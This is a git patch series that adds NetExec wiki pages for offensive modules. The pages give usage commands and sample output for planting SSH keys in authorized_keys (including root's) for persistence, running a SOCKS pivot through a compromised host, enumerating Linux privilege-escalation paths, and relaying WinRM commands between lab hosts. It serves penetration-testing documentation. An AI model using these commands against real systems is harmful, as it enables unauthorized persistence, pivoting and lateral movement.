From ba5a7596adf43cb0af9e08a833b82b8381da506f Mon Sep 17 00:00:00 2001 From: overgrowncarrot1 Date: Wed, 20 Aug 2025 06:11:32 -0700 Subject: [PATCH 1/4] Add ssh_socks and persist_key module documentation to wiki --- ssh-protocol/persist_key.md | 71 +++++++++++++++++++++++++++++++++++++ ssh-protocol/ssh_socks.md | 39 ++++++++++++++++++++ 2 files changed, 110 insertions(+) create mode 100644 ssh-protocol/persist_key.md create mode 100644 ssh-protocol/ssh_socks.md diff --git a/ssh-protocol/persist_key.md b/ssh-protocol/persist_key.md new file mode 100644 index 0000000..ba5f9fc --- /dev/null +++ b/ssh-protocol/persist_key.md @@ -0,0 +1,71 @@ +# `persist_key` Module + +The `persist_key` module allows you to **inject or remove SSH public keys** into a targetโ€™s +`~/.ssh/authorized_keys` file for persistence on Linux systems. + +--- + +## ๐Ÿ“– Description + +- **Module name:** `persist_key` +- **Purpose:** Maintain persistent access by planting or removing SSH keys. +- **Protocols:** `ssh` +- **OpSec safe:** โš ๏ธ Yes (but persistence is detectable). +- **Multiple hosts:** โŒ No โ€” one SSH session at a time. + +--- + +## โš™๏ธ Options + +| Option | Default | Description | +|------------|----------|-----------------------------------------------------------------------------| +| `PUBKEY` | *(auto)* | Path to a public key file, or the raw public key string. Defaults to scanning `~/.ssh/id_*.pub`. | +| `USER` | *(auto)* | Target username. Defaults to the logged-in SSH user. | +| `BACKUP` | `true` | Whether to back up `authorized_keys` before modifying. (`true/false`) | +| `REMOVE` | `false` | Remove mode: `true` (remove key), or `backup` (remove key + delete backup). | +| `KEX` | *(none)* | Comma-separated list of KEX algorithms (legacy compatibility). | +| `HOSTKEY` | *(none)* | Comma-separated list of hostkey algorithms (legacy compatibility). | + +--- + +## โ–ถ๏ธ Usage + +### Add your default SSH key +```bash +nxc ssh -u -p -M persist_key +nxc ssh -u -p -M persist_key -o PUBKEY=/path/to/key.pub``` + +To use copy and pasted public key +```bash +nxc ssh -u -p -M persist_key -o PUBKEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI... attacker@host"``` + +To drop key into another users folder +```bash +nxc ssh -u -p -M persist_key -o PUBKEY=/tmp/key.pub,USER=root``` + +To not backup keys on target system +```bash +nxc ssh -u -p -M persist_key -o BACKUP=false +``` + +Remove a previously added key +```bash +nxc ssh -u -p -M persist_key -o REMOVE=true,PUBKEY=/tmp/key.pub +``` + +Remove key and delete backup (bring back to original environment will not remove other authorized keys already on target system +```bash +nxc ssh -u -p -M persist_key -o REMOVE=backup,PUBKEY=/tmp/key.pub +``` + +Use Legacy +```bash +nxc ssh -u -p -M persist_key -o KEX="diffie-hellman-group1-sha1",HOSTKEY="ssh-rsa" +``` + +Autoremove added keys, and bring target system to original state +```bash +nxc ssh -u -p -M persist_key -o REMOVE=backup +``` + + diff --git a/ssh-protocol/ssh_socks.md b/ssh-protocol/ssh_socks.md new file mode 100644 index 0000000..c9eba87 --- /dev/null +++ b/ssh-protocol/ssh_socks.md @@ -0,0 +1,39 @@ +# `ssh_socks` Module + +The `ssh_socks` module provides a **SOCKS5 proxy** over an existing SSH connection. +It allows tunneling network traffic from your attacking host through the compromised SSH target. + +--- + +## ๐Ÿ“– Description + +- **Module name:** `ssh_socks` +- **Purpose:** Expose a SOCKS5 proxy bound locally (default: `127.0.0.1:1080`). +- **Protocols:** `ssh` +- **OpSec safe:** โœ… Yes โ€” works via existing SSH transport. +- **Multiple hosts:** โŒ No โ€” one SSH session at a time. + +--- + +## โš™๏ธ Options + +| Option | Default | Description | +|----------|----------|-----------------------------------------------------------------------------| +| `PORT` | `1080` | Local port to bind the SOCKS5 proxy. | +| `KEX` | *(none)* | Comma-separated list of key exchange algorithms to force (for legacy hosts). | +| `HOSTKEY`| *(none)* | Comma-separated list of hostkey algorithms to force (for legacy hosts). | + +--- + +## โ–ถ๏ธ Usage + +### Basic usage (default SOCKS5 proxy) +Start a SOCKS5 proxy on `127.0.0.1:1080`: +```bash +nxc ssh -u -p -M ssh_socks +nxc ssh -u -p -M ssh_socks -o PORT=9050 +nxc ssh -u -p -M ssh_socks -o KEX="diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1" +nxc ssh -u -p -M ssh_socks -o HOSTKEY="ssh-rsa,ssh-dss" +nxc ssh -u -p -M ssh_socks -o PORT=1081,KEX="diffie-hellman-group1-sha1",HOSTKEY="ssh-rsa" +``` +To stop proxy ctrl+c in terminal window From bbd5062a55bc6a9d10f0a364efc53bbdae8e5fd9 Mon Sep 17 00:00:00 2001 From: overgrowncarrot1 Date: Wed, 27 Aug 2025 12:25:00 +0000 Subject: [PATCH 2/4] Updated Wiki for Linux Priv Esc Check module --- ssh-protocol/linux_privesc_check.md | 88 +++++++++++++++++++++++++++++ ssh-protocol/persist_key.md | 71 ----------------------- ssh-protocol/ssh_socks.md | 39 ------------- 3 files changed, 88 insertions(+), 110 deletions(-) create mode 100644 ssh-protocol/linux_privesc_check.md delete mode 100644 ssh-protocol/persist_key.md delete mode 100644 ssh-protocol/ssh_socks.md diff --git a/ssh-protocol/linux_privesc_check.md b/ssh-protocol/linux_privesc_check.md new file mode 100644 index 0000000..418ef96 --- /dev/null +++ b/ssh-protocol/linux_privesc_check.md @@ -0,0 +1,88 @@ +# Linux Privilege Escalation Check (NetExec Module) + +The `linux_privesc_check` module helps identify common privilege escalation paths on Linux hosts. +It does **not exploit** vulnerabilities directly โ€” it highlights possible escalation methods for further manual testing. + +--- + +## Module Options + +- **NO_SUDO**: Skip `sudo -l` checks +- **NO_GTF**: Skip GTFOBins lookups (no internet required) +- **SHOW_ALL_SUID**: Show *all* SUID binaries (not just GTFOBins-exploitable ones) +- **SHOW_ALL_CAPS**: Show *all* binaries with Linux capabilities + +--- + +## Attack Examples + +### 1. Run Full Enumeration (default) +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check +``` + +### 1.1 Expected Ouput +```bash +[linux_privesc_check] Running Linux privilege escalation checks... +[Kernel] Linux victim 5.15.0-86-generic #96-Ubuntu SMP x86_64 GNU/Linux +[User Info] uid=1000(alice) gid=1000(alice) groups=1000(alice) +[Sudo] Checking sudo -l... + (ALL : ALL) NOPASSWD: /usr/bin/vim -> https://gtfobins.github.io/gtfobins/vim/#sudo +[SUID] Checking for exploitable SUID binaries... +Exploit SUID: /usr/bin/find -> https://gtfobins.github.io/gtfobins/find/#suid +[Capabilities] Checking for binaries with capabilities... +Capability: /usr/bin/python3.8 = cap_setuid+ep -> https://gtfobins.github.io/gtfobins/python/#capabilities +``` + +### 2. Skip Sudo (no sudo -l) +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o NO_SUDO=true +``` + +### 2.1 Expected Output +```bash +[linux_privesc_check] Skipping sudo -l enumeration (NO_SUDO) +[SUID] Checking for exploitable SUID binaries... +... +``` + +### 3. Skip GTFOBins Lookup +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o NO_GTF=true +``` + +### 3.1 Expected Output +```bash +[linux_privesc_check] Skipping GTFOBins lookups (NO_GTF) +[SUID] Checking for exploitable SUID binaries... +Exploit SUID: /usr/bin/passwd +[Capabilities] Checking for binaries with capabilities... +Capability: /usr/bin/tar = cap_dac_read_search+ep +``` + +### 4. Show all SUID Binaries +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o SHOW_ALL_SUID=true +``` + +### 4.1 Expected Output +```bash +[SUID] Checking for exploitable SUID binaries... +Exploit SUID: /usr/bin/passwd +Exploit SUID: /usr/bin/chsh +Exploit SUID: /usr/bin/su +... +``` + +### 5. Show all Capabilites +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o SHOW_ALL_CAPS=true +``` + +### 5.1 Expected Output +```bash +[Capabilities] Checking for binaries with capabilities... +Capability: /usr/bin/ping = cap_net_raw+ep +Capability: /usr/bin/python3.8 = cap_setuid+ep +... +``` \ No newline at end of file diff --git a/ssh-protocol/persist_key.md b/ssh-protocol/persist_key.md deleted file mode 100644 index ba5f9fc..0000000 --- a/ssh-protocol/persist_key.md +++ /dev/null @@ -1,71 +0,0 @@ -# `persist_key` Module - -The `persist_key` module allows you to **inject or remove SSH public keys** into a targetโ€™s -`~/.ssh/authorized_keys` file for persistence on Linux systems. - ---- - -## ๐Ÿ“– Description - -- **Module name:** `persist_key` -- **Purpose:** Maintain persistent access by planting or removing SSH keys. -- **Protocols:** `ssh` -- **OpSec safe:** โš ๏ธ Yes (but persistence is detectable). -- **Multiple hosts:** โŒ No โ€” one SSH session at a time. - ---- - -## โš™๏ธ Options - -| Option | Default | Description | -|------------|----------|-----------------------------------------------------------------------------| -| `PUBKEY` | *(auto)* | Path to a public key file, or the raw public key string. Defaults to scanning `~/.ssh/id_*.pub`. | -| `USER` | *(auto)* | Target username. Defaults to the logged-in SSH user. | -| `BACKUP` | `true` | Whether to back up `authorized_keys` before modifying. (`true/false`) | -| `REMOVE` | `false` | Remove mode: `true` (remove key), or `backup` (remove key + delete backup). | -| `KEX` | *(none)* | Comma-separated list of KEX algorithms (legacy compatibility). | -| `HOSTKEY` | *(none)* | Comma-separated list of hostkey algorithms (legacy compatibility). | - ---- - -## โ–ถ๏ธ Usage - -### Add your default SSH key -```bash -nxc ssh -u -p -M persist_key -nxc ssh -u -p -M persist_key -o PUBKEY=/path/to/key.pub``` - -To use copy and pasted public key -```bash -nxc ssh -u -p -M persist_key -o PUBKEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI... attacker@host"``` - -To drop key into another users folder -```bash -nxc ssh -u -p -M persist_key -o PUBKEY=/tmp/key.pub,USER=root``` - -To not backup keys on target system -```bash -nxc ssh -u -p -M persist_key -o BACKUP=false -``` - -Remove a previously added key -```bash -nxc ssh -u -p -M persist_key -o REMOVE=true,PUBKEY=/tmp/key.pub -``` - -Remove key and delete backup (bring back to original environment will not remove other authorized keys already on target system -```bash -nxc ssh -u -p -M persist_key -o REMOVE=backup,PUBKEY=/tmp/key.pub -``` - -Use Legacy -```bash -nxc ssh -u -p -M persist_key -o KEX="diffie-hellman-group1-sha1",HOSTKEY="ssh-rsa" -``` - -Autoremove added keys, and bring target system to original state -```bash -nxc ssh -u -p -M persist_key -o REMOVE=backup -``` - - diff --git a/ssh-protocol/ssh_socks.md b/ssh-protocol/ssh_socks.md deleted file mode 100644 index c9eba87..0000000 --- a/ssh-protocol/ssh_socks.md +++ /dev/null @@ -1,39 +0,0 @@ -# `ssh_socks` Module - -The `ssh_socks` module provides a **SOCKS5 proxy** over an existing SSH connection. -It allows tunneling network traffic from your attacking host through the compromised SSH target. - ---- - -## ๐Ÿ“– Description - -- **Module name:** `ssh_socks` -- **Purpose:** Expose a SOCKS5 proxy bound locally (default: `127.0.0.1:1080`). -- **Protocols:** `ssh` -- **OpSec safe:** โœ… Yes โ€” works via existing SSH transport. -- **Multiple hosts:** โŒ No โ€” one SSH session at a time. - ---- - -## โš™๏ธ Options - -| Option | Default | Description | -|----------|----------|-----------------------------------------------------------------------------| -| `PORT` | `1080` | Local port to bind the SOCKS5 proxy. | -| `KEX` | *(none)* | Comma-separated list of key exchange algorithms to force (for legacy hosts). | -| `HOSTKEY`| *(none)* | Comma-separated list of hostkey algorithms to force (for legacy hosts). | - ---- - -## โ–ถ๏ธ Usage - -### Basic usage (default SOCKS5 proxy) -Start a SOCKS5 proxy on `127.0.0.1:1080`: -```bash -nxc ssh -u -p -M ssh_socks -nxc ssh -u -p -M ssh_socks -o PORT=9050 -nxc ssh -u -p -M ssh_socks -o KEX="diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1" -nxc ssh -u -p -M ssh_socks -o HOSTKEY="ssh-rsa,ssh-dss" -nxc ssh -u -p -M ssh_socks -o PORT=1081,KEX="diffie-hellman-group1-sha1",HOSTKEY="ssh-rsa" -``` -To stop proxy ctrl+c in terminal window From f1ec7ba7b19b0849e7fe3c4849a9c6979b3c6149 Mon Sep 17 00:00:00 2001 From: overgrowncarrot1 Date: Wed, 27 Aug 2025 12:54:03 +0000 Subject: [PATCH 3/4] Updated Wiki for WinRm Relay Module --- ssh-protocol/linux_privesc_check.md | 88 ----------------------------- winrm-protocol/winrm-relay.md | 52 +++++++++++++++++ 2 files changed, 52 insertions(+), 88 deletions(-) delete mode 100644 ssh-protocol/linux_privesc_check.md create mode 100644 winrm-protocol/winrm-relay.md diff --git a/ssh-protocol/linux_privesc_check.md b/ssh-protocol/linux_privesc_check.md deleted file mode 100644 index 418ef96..0000000 --- a/ssh-protocol/linux_privesc_check.md +++ /dev/null @@ -1,88 +0,0 @@ -# Linux Privilege Escalation Check (NetExec Module) - -The `linux_privesc_check` module helps identify common privilege escalation paths on Linux hosts. -It does **not exploit** vulnerabilities directly โ€” it highlights possible escalation methods for further manual testing. - ---- - -## Module Options - -- **NO_SUDO**: Skip `sudo -l` checks -- **NO_GTF**: Skip GTFOBins lookups (no internet required) -- **SHOW_ALL_SUID**: Show *all* SUID binaries (not just GTFOBins-exploitable ones) -- **SHOW_ALL_CAPS**: Show *all* binaries with Linux capabilities - ---- - -## Attack Examples - -### 1. Run Full Enumeration (default) -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -``` - -### 1.1 Expected Ouput -```bash -[linux_privesc_check] Running Linux privilege escalation checks... -[Kernel] Linux victim 5.15.0-86-generic #96-Ubuntu SMP x86_64 GNU/Linux -[User Info] uid=1000(alice) gid=1000(alice) groups=1000(alice) -[Sudo] Checking sudo -l... - (ALL : ALL) NOPASSWD: /usr/bin/vim -> https://gtfobins.github.io/gtfobins/vim/#sudo -[SUID] Checking for exploitable SUID binaries... -Exploit SUID: /usr/bin/find -> https://gtfobins.github.io/gtfobins/find/#suid -[Capabilities] Checking for binaries with capabilities... -Capability: /usr/bin/python3.8 = cap_setuid+ep -> https://gtfobins.github.io/gtfobins/python/#capabilities -``` - -### 2. Skip Sudo (no sudo -l) -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o NO_SUDO=true -``` - -### 2.1 Expected Output -```bash -[linux_privesc_check] Skipping sudo -l enumeration (NO_SUDO) -[SUID] Checking for exploitable SUID binaries... -... -``` - -### 3. Skip GTFOBins Lookup -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o NO_GTF=true -``` - -### 3.1 Expected Output -```bash -[linux_privesc_check] Skipping GTFOBins lookups (NO_GTF) -[SUID] Checking for exploitable SUID binaries... -Exploit SUID: /usr/bin/passwd -[Capabilities] Checking for binaries with capabilities... -Capability: /usr/bin/tar = cap_dac_read_search+ep -``` - -### 4. Show all SUID Binaries -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o SHOW_ALL_SUID=true -``` - -### 4.1 Expected Output -```bash -[SUID] Checking for exploitable SUID binaries... -Exploit SUID: /usr/bin/passwd -Exploit SUID: /usr/bin/chsh -Exploit SUID: /usr/bin/su -... -``` - -### 5. Show all Capabilites -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o SHOW_ALL_CAPS=true -``` - -### 5.1 Expected Output -```bash -[Capabilities] Checking for binaries with capabilities... -Capability: /usr/bin/ping = cap_net_raw+ep -Capability: /usr/bin/python3.8 = cap_setuid+ep -... -``` \ No newline at end of file diff --git a/winrm-protocol/winrm-relay.md b/winrm-protocol/winrm-relay.md new file mode 100644 index 0000000..07597a9 --- /dev/null +++ b/winrm-protocol/winrm-relay.md @@ -0,0 +1,52 @@ +# WinRM Relay Module + +This module allows relaying commands from one WinRM host to another. +It can be used to execute commands on a relayed target by authenticating through another WinRM host. + +Options structure is as follows +```bash +REMOTE=::: +``` + +For more than one relay +```bash +REMOTE=:::,REMOTE=:::,REMOTE=::: +``` +--- + +## Example 1: Relay with username and password (utilizing same username and password on remote machine) + +### Command +```bash +nxc winrm 192.168.56.12 \ + -u user1 -p 'Passw0rd!' \ + -x whoami \ + -M winrm_relay \ + -o REMOTE=192.168.56.11 +``` + +### Expected Response + +```bash +[*] Authenticating to 192.168.56.12 as user1 +[+] Authentication successful +[*] Relaying to 192.168.56.11 +[+] whoami executed successfully +domain\user1 +``` + +### Relay Alternate Usernames and Passwords Along with Alternate Domain (multiple relays) + +```bash +nxc winrm 192.168.56.11 -u vagrant -p vagrant -x hostname -M winrm_relay -o REMOTE='192.168.56.12:admin:P@ssw0rd!:ESSOS.LOCAL','KINGSLANDING:admin:P@ssw0rd!:sevenkingdoms.local' +``` + +### Expected Response + +```bash +WINRM 192.168.56.11 5985 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) +WINRM 192.168.56.11 5985 WINTERFELL [+] north.sevenkingdoms.local\vagrant:vagrant (Pwn3d!) +WINRM_RELAY 192.168.56.11 5985 WINTERFELL meereen: essos\admin +WINRM_RELAY 192.168.56.11 5985 WINTERFELL KINGSLANDING.sevenkingdoms.local: sevenkingdoms\admin +``` + From 7fb6df0d1b6239893d60882f7b37915d20718ff5 Mon Sep 17 00:00:00 2001 From: overgrowncarrot1 Date: Mon, 1 Sep 2025 15:21:14 +0000 Subject: [PATCH 4/4] Added winrmjump to wiki for PR 903 --- winrm-protocol/{winrm-relay.md => winrmjump.md} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename winrm-protocol/{winrm-relay.md => winrmjump.md} (79%) diff --git a/winrm-protocol/winrm-relay.md b/winrm-protocol/winrmjump.md similarity index 79% rename from winrm-protocol/winrm-relay.md rename to winrm-protocol/winrmjump.md index 07597a9..05f6120 100644 --- a/winrm-protocol/winrm-relay.md +++ b/winrm-protocol/winrmjump.md @@ -5,12 +5,12 @@ It can be used to execute commands on a relayed target by authenticating through Options structure is as follows ```bash -REMOTE=::: +REMOTE= ``` For more than one relay ```bash -REMOTE=:::,REMOTE=:::,REMOTE=::: +REMOTE= ,REMOTE= ,REMOTE= ``` --- @@ -38,7 +38,7 @@ domain\user1 ### Relay Alternate Usernames and Passwords Along with Alternate Domain (multiple relays) ```bash -nxc winrm 192.168.56.11 -u vagrant -p vagrant -x hostname -M winrm_relay -o REMOTE='192.168.56.12:admin:P@ssw0rd!:ESSOS.LOCAL','KINGSLANDING:admin:P@ssw0rd!:sevenkingdoms.local' +nxc winrm 192.168.56.11 -u vagrant -p vagrant -x hostname -M winrm_relay -o REMOTE='192.168.56.12 admin P@ssw0rd! ESSOS.LOCAL','KINGSLANDING admin P@ssw0rd! sevenkingdoms.local' ``` ### Expected Response